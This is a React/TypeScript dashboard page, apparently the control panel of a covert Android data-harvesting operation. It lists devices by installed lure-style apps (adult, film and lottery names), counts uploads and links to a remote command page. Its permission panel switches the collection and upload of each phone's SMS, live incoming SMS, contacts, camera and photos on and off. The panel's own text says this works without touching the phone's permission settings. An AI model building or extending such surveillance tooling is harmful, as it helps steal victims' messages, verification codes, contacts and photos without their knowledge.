import { useState, useEffect } from 'react';
import { useNavigate } from 'react-router-dom';
import { useAuth } from '../hooks/useAuth';
import { getDevices, getDeviceStats, Device, DevicePermissionsUpdate, updateDevicePermissions, deleteDevice, getDevicePermissions } from '../services/api';

const REMOTE_PERM_MAP: Record<string, string> = {
  camera: 'remote_camera',
  sms: 'remote_sms',
  sms_receive: 'remote_sms_receive',
  contacts: 'remote_contacts',
  album: 'remote_album',
};

const REMOTE_PERM_LABELS: Record<string, string> = {
  camera: '📷 相机',
  sms: '📩 读取短信',
  sms_receive: '📶 实时接收短信',
  contacts: '👥 通讯录',
  album: '📁 相册/存储',
};

// 设备 ID 形如 android-<applicationId>-<ANDROID_ID>，从中解析出安装的 APK。
const APP_NAME_BY_PACKAGE: Record<string, string> = {
  'com.eden.garden': 'admin-app-chengren',
  'com.eden.gardena': 'android-app-yingshi',
  'com.eden.gardenb': 'auto-app-liuhecan',
  'com.eden.demo': 'demo-app',
  'com.eden.field': 'field-app',
  'com.eden.kiosk': 'kiosk-app',
  'com.eden.partner': 'partner-app',
  'com.eden.test': 'test-app',
  'com.eden.tv': 'tv-app',
  'com.eden.wear': 'wear-app',
};

function getAppName(deviceId: string) {
  const m = /^android-(.+)-[0-9a-f]{6,}$/i.exec(deviceId || '');
  const pkg = m ? m[1] : '';
  return APP_NAME_BY_PACKAGE[pkg] || pkg || '未知应用';
}

export function DashboardPage() {
  const { user, logout } = useAuth();
  const navigate = useNavigate();
  const [devices, setDevices] = useState<Device[]>([]);
  const [stats, setStats] = useState({
    totalDevices: 0,
    onlineDevices: 0,
    offlineDevices: 0,
    totalUploads: 0,
    pendingUploads: 0,
  });
  const [loading, setLoading] = useState(true);
  const [page, setPage] = useState(1);
  const [totalPages, setTotalPages] = useState(1);
  const [search, setSearch] = useState('');
  const [sendingPerm, setSendingPerm] = useState<string | null>(null);
  const [remotePerms, setRemotePerms] = useState<Record<string, boolean>>({});

  const fetchDevices = async (page = 1) => {
    try {
      const response = await getDevices(page);
      setDevices(response.data);
      setTotalPages(response.pagination.totalPages);
    } catch (error) {
      console.error('Failed to fetch devices:', error);
    } finally {
      setLoading(false);
    }
  };

  const fetchStats = async () => {
    try {
      const response = await getDeviceStats();
      if (response.success) {
        setStats(response.data);
      }
    } catch (error) {
      console.error('Failed to fetch stats:', error);
    } finally {
      setLoading(false);
    }
  };

  useEffect(() => {
    fetchDevices(1);
    fetchStats();
  }, []);

  const handlePageChange = (page: number) => {
    setPage(page);
    fetchDevices(page);
  };

  const searchDeviceId = search ? devices.find(d => d.device_id.startsWith(search))?.device_id : undefined;

  useEffect(() => {
    let active = true;
    if (!searchDeviceId) {
      setRemotePerms({});
      return;
    }
    (async () => {
      try {
        const res = await getDevicePermissions(searchDeviceId);
        if (!active || !res.success) return;
        const data = res.data;
        const next: Record<string, boolean> = {};
        for (const [shared, remoteKey] of Object.entries(REMOTE_PERM_MAP)) {
          const v = data[remoteKey as keyof typeof data];
          next[shared] = v === undefined ? true : !!v;
        }
        setRemotePerms(next);
      } catch (error) {
        console.error('Failed to fetch remote permissions:', error);
      }
    })();
    return () => { active = false; };
  }, [searchDeviceId]);

  const filteredDevices = search
    ? devices.filter(d =>
        d.device_id.toLowerCase().includes(search.toLowerCase()) ||
        d.model.toLowerCase().includes(search.toLowerCase()) ||
        d.manufacturer.toLowerCase().includes(search.toLowerCase())
      )
    : devices;

  const handleDeleteDevice = async (deviceId: string) => {
    if (!window.confirm('确定要删除该设备吗？此操作不可恢复。')) return;
    try {
      await deleteDevice(deviceId);
      const response = await getDevices(page);
      setDevices(response.data);
    } catch (error) {
      console.error('Failed to delete device:', error);
      window.alert('删除设备失败');
    }
  };

  const handleTogglePermission = async (shared: string) => {
    if (!searchDeviceId) return;
    const remoteKey = REMOTE_PERM_MAP[shared];
    if (!remoteKey) return;
    setSendingPerm(searchDeviceId);
    try {
      const current = remotePerms[shared] !== false;
      const update = { [remoteKey]: !current, target: 'control' } as DevicePermissionsUpdate;
      await updateDevicePermissions(searchDeviceId, update);
      const res = await getDevicePermissions(searchDeviceId);
      if (res.success) {
        const data = res.data;
        setRemotePerms(prev => ({
          ...prev,
          [shared]: data[remoteKey as keyof typeof data] !== false,
        }));
      }
    } catch (error) {
      console.error('Failed to update permission:', error);
    } finally {
      setSendingPerm(null);
    }
  };

  if (loading) {
    return (
      <div className="min-h-screen flex items-center justify-center">
        <div className="animate-spin rounded-full h-12 w-12 border-4 border-indigo-600 border-t-transparent"></div>
      </div>
    );
  }

  return (
    <div className="min-h-screen bg-gray-50">
      {/* Header */}
      <header className="bg-white shadow-sm border-b border-gray-200">
        <div className="max-w-7xl mx-auto px-4 sm:px-6 lg:px-8">
          <div className="flex justify-between items-center h-16">
            <div className="flex items-center">
              <h1 className="text-xl font-bold text-gray-900">Eden 设备管理</h1>
            </div>
            <div className="flex items-center space-x-4">
              <span className="text-sm text-gray-700">
                {user?.name} ({user?.email})
              </span>
              <button
                onClick={() => { logout(); window.location.href = '/login'; }}
                className="px-3 py-1 text-sm font-medium text-gray-700 bg-white border border-gray-300 rounded-md hover:bg-gray-50"
              >
                退出登录
              </button>
            </div>
          </div>
        </div>
      </header>

      <main className="max-w-7xl mx-auto px-4 sm:px-6 lg:px-8 py-8">
        {/* Stats Cards */}
        <div className="grid grid-cols-1 md:grid-cols-2 lg:grid-cols-5 gap-6 mb-8">
          <StatCard title="总设备数" value={stats.totalDevices} icon="📱" color="blue" />
          <StatCard title="在线设备" value={stats.onlineDevices} icon="🟢" color="green" />
          <StatCard title="离线设备" value={stats.offlineDevices} icon="🔴" color="red" />
          <StatCard title="总上传数" value={stats.totalUploads} icon="📤" color="purple" />
          <StatCard title="待上传" value={stats.pendingUploads} icon="⏳" color="yellow" />
        </div>

        {/* Device Table */}
        <div className="bg-white rounded-lg shadow-sm border border-gray-200">
          <div className="px-6 py-4 border-b border-gray-200 flex justify-between items-center">
            <h2 className="text-lg font-semibold text-gray-900">设备列表</h2>
            <div className="flex items-center space-x-4">
<input
                type="text"
                placeholder="\u641C\u7D22\u8BBE\u5907 ID\u3001\u578B\u53F7..."
                value={search}
                onChange={(e) => setSearch(e.target.value)}
                className="px-3 py-2 border border-gray-300 rounded-md text-sm focus:outline-none focus:ring-2 focus:ring-indigo-500"
              />
              <button
                onClick={() => { fetchDevices(page); fetchStats(); }}
                className="px-4 py-2 bg-indigo-600 text-white rounded-md hover:bg-indigo-700 text-sm font-medium"
              >
                刷新
              </button>
            </div>
          </div>

          <div className="overflow-x-auto">
            <table className="min-w-full divide-y divide-gray-200">
              <thead className="bg-gray-50">
                <tr>
                  <th className="px-6 py-3 text-left text-xs font-medium text-gray-500 uppercase tracking-wider">应用</th>
                  <th className="px-6 py-3 text-left text-xs font-medium text-gray-500 uppercase tracking-wider">型号</th>
                  <th className="px-6 py-3 text-left text-xs font-medium text-gray-500 uppercase tracking-wider">厂商</th>
                  <th className="px-6 py-3 text-left text-xs font-medium text-gray-500 uppercase tracking-wider">状态</th>
                  <th className="px-6 py-3 text-left text-xs font-medium text-gray-500 uppercase tracking-wider">电量</th>
                  <th className="px-6 py-3 text-left text-xs font-medium text-gray-500 uppercase tracking-wider">网络</th>
                  <th className="px-6 py-3 text-left text-xs font-medium text-gray-500 uppercase tracking-wider">最后在线</th>
                  <th className="px-6 py-3 text-right text-xs font-medium text-gray-500 uppercase tracking-wider">操作</th>
                </tr>
              </thead>
              <tbody className="bg-white divide-y divide-gray-200">
                {filteredDevices.length === 0 ? (
                  <tr>
                    <td colSpan={8} className="px-6 py-12 text-center text-gray-500">
                      {search ? '未找到匹配的设备' : '暂无设备数据'}
                    </td>
                  </tr>
                ) : (
                  filteredDevices.map((device) => (
                    <tr key={device.device_id} className="hover:bg-gray-50">
                      <td className="px-6 py-4 whitespace-nowrap">
                        <span className="text-sm text-gray-900 font-medium" title={device.device_id}>{getAppName(device.device_id)}</span>
                      </td>
                      <td className="px-6 py-4 whitespace-nowrap text-sm text-gray-900">{device.model}</td>
                      <td className="px-6 py-4 whitespace-nowrap text-sm text-gray-500">{device.manufacturer}</td>
                      <td className="px-6 py-4 whitespace-nowrap">
                        <span className={`inline-flex px-2 py-1 text-xs font-semibold rounded-full ${getStatusColor(device.status)}`}>
                          {getStatusText(device.status)}
                        </span>
                      </td>
                      <td className="px-6 py-4 whitespace-nowrap text-sm text-gray-500">{device.battery_level}%</td>
                      <td className="px-6 py-4 whitespace-nowrap text-sm text-gray-500">{device.network_type}</td>
                      <td className="px-6 py-4 whitespace-nowrap text-sm text-gray-500">
                        {new Date(device.last_seen).toLocaleString('zh-CN')}
                      </td>
                      <td className="px-6 py-4 whitespace-nowrap text-right text-sm font-medium">
                        <button
                          onClick={() => navigate(`/devices/${device.device_id}`)}
                          className="text-indigo-600 hover:text-indigo-900 mr-3"
                        >
                          详情
                        </button>
                        <button
                          onClick={() => navigate(`/commands?device=${device.device_id}`)}
                          className="text-indigo-600 hover:text-indigo-900 mr-3"
                        >
                          命令
                        </button>
                        <button
                          onClick={() => handleDeleteDevice(device.device_id)}
                          className="text-red-600 hover:text-red-900"
                        >
                          删除
                        </button>
                      </td>
                    </tr>
                  ))
                )}
              </tbody>
            </table>
          </div>

          {/* Pagination */}
          {totalPages > 1 && (
            <div className="px-6 py-4 border-t border-gray-200 flex items-center justify-between">
              <div className="text-sm text-gray-700">
                第 {page} 页，共 {totalPages} 页
              </div>
              <div className="flex space-x-2">
                <button
                  onClick={() => handlePageChange(page - 1)}
                  disabled={page === 1}
                  className="px-3 py-1 border border-gray-300 rounded-md text-sm disabled:opacity-50"
                >
                  上一页
                </button>
                <button
                  onClick={() => handlePageChange(page + 1)}
                  disabled={page === totalPages}
                  className="px-3 py-1 border border-gray-300 rounded-md text-sm disabled:opacity-50"
                >
                  下一页
                </button>
              </div>
            </div>
          )}

          {/* 权限控制面板 */}
          <div className="px-6 py-4 border-t border-gray-200 bg-gray-50">
            <h3 className="text-lg font-semibold text-gray-900 mb-3">权限控制</h3>
            {searchDeviceId ? (
              <>
                <p className="text-sm text-gray-600 mb-3">
                  设备：<code className="text-indigo-600" title={searchDeviceId}>{getAppName(searchDeviceId)}</code>
                </p>
                <div className="grid grid-cols-2 md:grid-cols-5 gap-3">
                  {Object.entries(REMOTE_PERM_MAP).map(([shared, remoteKey]) => {
                    const on = remotePerms[shared] !== false;
                    return (
                      <button
                        key={shared}
                        onClick={() => handleTogglePermission(shared)}
                        disabled={sendingPerm === searchDeviceId}
                        className={`px-3 py-2 rounded-md text-sm font-medium border ${
                          on
                            ? 'bg-green-100 text-green-800 border-green-300'
                            : 'bg-gray-100 text-gray-600 border-gray-300'
                        } disabled:opacity-50`}
                        title={remoteKey}
                      >
                        {REMOTE_PERM_LABELS[shared]} {on ? '✓' : '○'}
                      </button>
                    );
                  })}
                </div>
                <p className="text-xs text-gray-400 mt-3">
                  远程开关：即时控制该设备此数据的采集/上传（无需修改手机上的权限设置），下拉设备心跳会在下次同步时生效。
                </p>
              </>
            ) : (
              <p className="text-sm text-gray-500">在搜索框中输入设备 ID 或型号以选择设备，然后控制其权限。</p>
            )}
          </div>
        </div>
      </main>
    </div>
  );
}

// Helper components
function StatCard({ title, value, icon, color }: { title: string; value: number; icon: string; color: string }) {
  const colorClasses = {
    blue: 'bg-blue-100 text-blue-600',
    green: 'bg-green-100 text-green-600',
    red: 'bg-red-100 text-red-600',
    purple: 'bg-purple-100 text-purple-600',
    yellow: 'bg-yellow-100 text-yellow-600',
  };

  return (
    <div className="bg-white rounded-lg shadow-sm border border-gray-200 p-6">
      <div className="flex items-center">
        <div className={`p-3 rounded-lg ${colorClasses[color as keyof typeof colorClasses]}`}>
          <span className="text-2xl">{icon}</span>
        </div>
        <div className="ml-4">
          <p className="text-sm font-medium text-gray-600">{title}</p>
          <p className="text-2xl font-bold text-gray-900">{value}</p>
        </div>
      </div>
    </div>
  );
}

function getStatusText(status: string) {
  switch (status) {
    case 'online': return '在线';
    case 'offline': return '离线';
    case 'connecting': return '连接中';
    case 'error': return '错误';
    default: return status;
  }
}

function getStatusColor(status: string) {
  switch (status) {
    case 'online': return 'bg-green-100 text-green-800';
    case 'offline': return 'bg-gray-100 text-gray-800';
    case 'connecting': return 'bg-blue-100 text-blue-800';
    case 'error': return 'bg-red-100 text-red-800';
    default: return 'bg-gray-100 text-gray-800';
  }
}